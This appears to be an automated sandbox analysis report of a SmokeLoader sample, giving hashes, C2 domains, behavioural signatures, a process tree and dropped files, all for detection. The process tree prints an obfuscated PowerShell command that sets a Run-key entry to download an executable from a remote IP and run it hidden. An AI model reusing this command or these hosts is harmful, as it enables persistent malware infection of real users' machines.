Analysis

  • max time kernel
    150s
  • max time network
    198s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    13-08-2021 06:45

General

  • Target

    3da56853cea772e7f90f92c66d8c0a31.exe

  • Size

    320KB

  • MD5

    3da56853cea772e7f90f92c66d8c0a31

  • SHA1

    45a659f9006fb9703a1fef5fc9044a84788228ef

  • SHA256

    776124547155ae68a2dac2b106f6aa8d39b2e71a3b11ca6241a7e305fa03605a

  • SHA512

    0003c3fb6dab98f79f0fda8bd33140e9c35fc37ea4407dfdc930170f227d9209adbbbfeb96b9a41fc3ed5cfe44d716a74ff21222ec18e598db9de92a6d5ad9c8

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

http://readinglistforjuly6.site/

http://readinglistforjuly7.site/

http://readinglistforjuly8.site/

http://readinglistforjuly9.site/

http://readinglistforjuly10.site/

rc4.i32
rc4.i32

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • suricata: ET MALWARE Sharik/Smoke CnC Beacon 11

    suricata: ET MALWARE Sharik/Smoke CnC Beacon 11

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 6 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Drops startup file 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 42 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3da56853cea772e7f90f92c66d8c0a31.exe
    "C:\Users\Admin\AppData\Local\Temp\3da56853cea772e7f90f92c66d8c0a31.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1672
    • C:\Users\Admin\AppData\Local\Temp\3da56853cea772e7f90f92c66d8c0a31.exe
      "C:\Users\Admin\AppData\Local\Temp\3da56853cea772e7f90f92c66d8c0a31.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:1384
  • C:\Users\Admin\AppData\Local\Temp\E012.exe
    C:\Users\Admin\AppData\Local\Temp\E012.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetWindowsHookEx
    PID:956
  • C:\Users\Admin\AppData\Local\Temp\E448.exe
    C:\Users\Admin\AppData\Local\Temp\E448.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:552
    • C:\ProgramData\Runtimebroker.exe
      "C:\ProgramData\Runtimebroker.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1112
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://193.56.146.55/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'
        3⤵
          PID:1220
    • C:\Users\Admin\AppData\Local\Temp\E736.exe
      C:\Users\Admin\AppData\Local\Temp\E736.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1472
      • C:\Windows\SysWOW64\cmd.exe
        cmd /Q /C C:\Users\Admin\AppData\Local\Temp/s.bat
        2⤵
        • Drops startup file
        PID:656
    • C:\Users\Admin\AppData\Local\Temp\EBC9.exe
      C:\Users\Admin\AppData\Local\Temp\EBC9.exe
      1⤵
      • Executes dropped EXE
      PID:1572
    • C:\Users\Admin\AppData\Local\Temp\F5E7.exe
      C:\Users\Admin\AppData\Local\Temp\F5E7.exe
      1⤵
      • Executes dropped EXE
      • Checks BIOS information in registry
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of AdjustPrivilegeToken
      PID:788

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Virtualization/Sandbox Evasion

    1
    T1497

    Discovery

    Query Registry

    3
    T1012

    Virtualization/Sandbox Evasion

    1
    T1497

    System Information Discovery

    3
    T1082

    Peripheral Device Discovery

    1
    T1120

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\Runtimebroker.exe
      MD5

      16e7880b76dbc82d50fd96f38d1c2692

      SHA1

      b8b49ef406f74e50c7386f2fecbff18447ad9f4d

      SHA256

      9ccef739ddc3b6688be2a72a754c95f300f24d3b5181a3896328681bf933b4d7

      SHA512

      69071850ce17baaa5884f9531e2c7632b61a5777d58b826b1365d6f651f647a3521d456ceed29fbf5cf47ebf83176634371e7e5245a44d4b13b0855ffe10d6e3

    • C:\ProgramData\Runtimebroker.exe
      MD5

      16e7880b76dbc82d50fd96f38d1c2692

      SHA1

      b8b49ef406f74e50c7386f2fecbff18447ad9f4d

      SHA256

      9ccef739ddc3b6688be2a72a754c95f300f24d3b5181a3896328681bf933b4d7

      SHA512

      69071850ce17baaa5884f9531e2c7632b61a5777d58b826b1365d6f651f647a3521d456ceed29fbf5cf47ebf83176634371e7e5245a44d4b13b0855ffe10d6e3

    • C:\Users\Admin\AppData\Local\Temp\E012.exe
      MD5

      a69e12607d01237460808fa1709e5e86

      SHA1

      4a12f82aee1c90e70cdf6be863ce1a749c8ae411

      SHA256

      188e05efb42c1f7fdb5c910a6614f710a87ae642b23ac9ffe3f75246744865bc

      SHA512

      7533e6da6bac0405fc8b608da8020b54b6ee02592e6fd40ea342e130a8a876ae5ef4a1fd636d95e76339dbf8be45cecbd22ca2d0a4635b055ffafec3d7e15284

    • C:\Users\Admin\AppData\Local\Temp\E448.exe
      MD5

      16e7880b76dbc82d50fd96f38d1c2692

      SHA1

      b8b49ef406f74e50c7386f2fecbff18447ad9f4d

      SHA256

      9ccef739ddc3b6688be2a72a754c95f300f24d3b5181a3896328681bf933b4d7

      SHA512

      69071850ce17baaa5884f9531e2c7632b61a5777d58b826b1365d6f651f647a3521d456ceed29fbf5cf47ebf83176634371e7e5245a44d4b13b0855ffe10d6e3

    • C:\Users\Admin\AppData\Local\Temp\E448.exe
      MD5

      16e7880b76dbc82d50fd96f38d1c2692

      SHA1

      b8b49ef406f74e50c7386f2fecbff18447ad9f4d

      SHA256

      9ccef739ddc3b6688be2a72a754c95f300f24d3b5181a3896328681bf933b4d7

      SHA512

      69071850ce17baaa5884f9531e2c7632b61a5777d58b826b1365d6f651f647a3521d456ceed29fbf5cf47ebf83176634371e7e5245a44d4b13b0855ffe10d6e3

    • C:\Users\Admin\AppData\Local\Temp\E736.exe
      MD5

      b19ac380411ed5d8b5a7e7e0c1da61a6

      SHA1

      9665c20336a5ce437bbf7b564370bfa43e99954c

      SHA256

      aba88a19b2f6e2cf9a6a41ab8661d83c433acec363028f58dd74d37e335c7619

      SHA512

      73b4e3555cf9496a7138a2c7071ed81a754493afaf15f604a305f3eb051ed72645731a6174b0934f24371dbe5bd8c0185516f87778a018d84df4fff8aea0c208

    • C:\Users\Admin\AppData\Local\Temp\E736.exe
      MD5

      b19ac380411ed5d8b5a7e7e0c1da61a6

      SHA1

      9665c20336a5ce437bbf7b564370bfa43e99954c

      SHA256

      aba88a19b2f6e2cf9a6a41ab8661d83c433acec363028f58dd74d37e335c7619

      SHA512

      73b4e3555cf9496a7138a2c7071ed81a754493afaf15f604a305f3eb051ed72645731a6174b0934f24371dbe5bd8c0185516f87778a018d84df4fff8aea0c208

    • C:\Users\Admin\AppData\Local\Temp\EBC9.exe
      MD5

      5707ddada5b7ea6bef434cd294fa12e1

      SHA1

      45bb285a597b30e100ed4b15d96a29d718697e5e

      SHA256

      85205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c

      SHA512

      91cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13

    • C:\Users\Admin\AppData\Local\Temp\EBC9.exe
      MD5

      5707ddada5b7ea6bef434cd294fa12e1

      SHA1

      45bb285a597b30e100ed4b15d96a29d718697e5e

      SHA256

      85205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c

      SHA512

      91cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13

    • C:\Users\Admin\AppData\Local\Temp\F5E7.exe
      MD5

      717d65dba56f47e540dca074c3977b3d

      SHA1

      d58aa30f826f41663e693f0ad930fdce584f1672

      SHA256

      61fb1160ae372d9ba1c95400d5439450c6a66cdf073fa50ee2d5d10c4952cbb3

      SHA512

      b06e4358411eb8f6315c574922c021bd57218b3e6a0ed727df6b44e20e7818d40fb0347050ce9145ea7e0fd56a7fa93a2358e524c0df030d6d44067c7c83510d

    • C:\Users\Admin\AppData\Local\Temp\s.bat
      MD5

      f47c5b33e235fdbd950b60d97b77b324

      SHA1

      5e683bd583add11bfa9bfbadc7f3e7d32ce753fa

      SHA256

      88eb6fa824ca5a3435ff7746dbe891c99b42e072d7e43ffa9058063929ddd7dd

      SHA512

      20756b4b413f789f7b67b448cbd223f2e658d1afc49ef6aa255e64bc19b934c9808d60f655e3c7803c8d29db7c0709f1acb453e02d172450e402ebce479eec0d

    • \ProgramData\Runtimebroker.exe
      MD5

      16e7880b76dbc82d50fd96f38d1c2692

      SHA1

      b8b49ef406f74e50c7386f2fecbff18447ad9f4d

      SHA256

      9ccef739ddc3b6688be2a72a754c95f300f24d3b5181a3896328681bf933b4d7

      SHA512

      69071850ce17baaa5884f9531e2c7632b61a5777d58b826b1365d6f651f647a3521d456ceed29fbf5cf47ebf83176634371e7e5245a44d4b13b0855ffe10d6e3

    • \ProgramData\Runtimebroker.exe
      MD5

      16e7880b76dbc82d50fd96f38d1c2692

      SHA1

      b8b49ef406f74e50c7386f2fecbff18447ad9f4d

      SHA256

      9ccef739ddc3b6688be2a72a754c95f300f24d3b5181a3896328681bf933b4d7

      SHA512

      69071850ce17baaa5884f9531e2c7632b61a5777d58b826b1365d6f651f647a3521d456ceed29fbf5cf47ebf83176634371e7e5245a44d4b13b0855ffe10d6e3

    • memory/552-81-0x0000000000400000-0x0000000002C7D000-memory.dmp
      Filesize

      40.5MB

    • memory/552-69-0x0000000000000000-mapping.dmp
    • memory/552-80-0x0000000000260000-0x000000000029B000-memory.dmp
      Filesize

      236KB

    • memory/656-104-0x0000000000000000-mapping.dmp
    • memory/788-94-0x00000000001D0000-0x00000000001D1000-memory.dmp
      Filesize

      4KB

    • memory/788-90-0x0000000000000000-mapping.dmp
    • memory/788-96-0x00000000009D0000-0x00000000009D1000-memory.dmp
      Filesize

      4KB

    • memory/956-65-0x0000000000000000-mapping.dmp
    • memory/1112-82-0x0000000000400000-0x0000000002C7D000-memory.dmp
      Filesize

      40.5MB

    • memory/1112-75-0x0000000000000000-mapping.dmp
    • memory/1220-98-0x0000000000000000-mapping.dmp
    • memory/1292-64-0x0000000002790000-0x00000000027A6000-memory.dmp
      Filesize

      88KB

    • memory/1384-61-0x0000000000402E1A-mapping.dmp
    • memory/1384-62-0x00000000767B1000-0x00000000767B3000-memory.dmp
      Filesize

      8KB

    • memory/1384-60-0x0000000000400000-0x0000000000409000-memory.dmp
      Filesize

      36KB

    • memory/1472-100-0x0000000004F30000-0x0000000005141000-memory.dmp
      Filesize

      2.1MB

    • memory/1472-78-0x0000000000000000-mapping.dmp
    • memory/1472-102-0x0000000000400000-0x0000000002D86000-memory.dmp
      Filesize

      41.5MB

    • memory/1472-89-0x0000000000400000-0x0000000002D86000-memory.dmp
      Filesize

      41.5MB

    • memory/1472-87-0x0000000003020000-0x0000000003263000-memory.dmp
      Filesize

      2.3MB

    • memory/1572-83-0x0000000000000000-mapping.dmp
    • memory/1572-101-0x0000000004910000-0x0000000004911000-memory.dmp
      Filesize

      4KB

    • memory/1572-86-0x0000000000140000-0x0000000000141000-memory.dmp
      Filesize

      4KB

    • memory/1672-63-0x0000000000020000-0x000000000002A000-memory.dmp
      Filesize

      40KB